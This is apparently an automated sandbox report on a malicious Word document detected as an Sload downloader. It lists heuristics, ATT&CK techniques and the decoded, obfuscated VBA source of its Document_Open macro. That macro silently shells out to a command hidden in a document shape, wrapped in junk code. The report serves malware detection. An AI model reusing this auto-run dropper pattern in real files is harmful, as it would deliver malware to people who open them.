MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains a Document_Open VBA macro that executes a complex PowerShell command. This command decodes a Base64 string, decompresses it, and then executes it using PowerShell. The heuristic firings indicate suspicious cmd.exe and PowerShell invocations, supporting the analysis that this macro is designed to download and execute a second-stage payload. The ClamAV detection of 'Doc.Downloader.Sload-6743946-0' further confirms its malicious downloader nature.
Heuristics 8
-
ClamAV: Doc.Downloader.Sload-6743946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6743946-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1001 bytes |
SHA-256: 7a470984757249e28125b561e558a5a9d1cb0b10ed21ed6110f5c32b35389adc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
26 of 49 identifiers look randomly generated (e.g. 'XKKjruSGAC') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wRwKSaUDD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next poYGw = (PLjqDq + jrTuBN + EUzUmz + YhrzS / DHAVQ + dkvOm + aFTjrl + GuOUr) YGFph = hwNTrj + LLkIw + wTonjX + knBOsi * hmtEBL + aQJNN * PUzSzE + oskSWS + vtwza + zkZSf Hqdstk = ucqzdB + NJFKXL + zpqFhL + omJRw / WtRWt + zKrst + OXhFO + jICHBn Const XKKjruSGAC = 383684964 - 383684964 Shell@ Shapes(1).TextFrame.TextRange.Text + XDfaVsM + jPnovoCb, XKKjruSGAC SrawY = OPSiL + vntmzv / (FEhrD + OiCwBb / (nOhjzn + fbEUL + aoQma + PRLHk)) hizzj = JNmiFa + bajZnq * (npaFj + fMLLq) CKdMS = CWqjG + mKusi + NjnTa + PWnLW / Gwkckq + OlDIs + HKdnEV + hHXSj / jQzvdq + OaJZJ GShTKm = ffvim + SGRpEs + ZsfCN + nZEvWr * YfRqkV + UNjUMw End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.